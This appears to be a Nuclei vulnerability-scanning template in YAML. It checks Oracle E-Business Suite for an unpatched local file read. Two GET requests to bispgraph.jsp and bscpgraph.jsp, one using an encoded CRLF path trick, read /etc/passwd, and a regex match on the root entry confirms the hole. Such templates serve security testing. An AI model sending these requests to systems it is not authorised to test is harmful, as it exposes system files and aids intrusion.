mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-06 18:53:16 +08:00
27 lines
1.1 KiB
YAML
27 lines
1.1 KiB
YAML
id: oracle-ebs-bispgrapgh-file-read
|
|
|
|
info:
|
|
name: Oracle eBusiness Suite - Improper File Access
|
|
author: emenalf,tirtha_mandal,thomas_from_offensity
|
|
severity: critical
|
|
description: |
|
|
Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.
|
|
reference:
|
|
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
|
|
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
|
|
metadata:
|
|
max-request: 2
|
|
tags: oracle,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
|
|
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a004730450221008f2ef11b35df3594b76a370de6674e761ccb2828176b65453d6251d05e46482a02201746983f76a279758ef2f9fe83a6356ac429b8256a7c57959870ad393bf08f6c:922c64590222798bb761d5b6d8e72950 |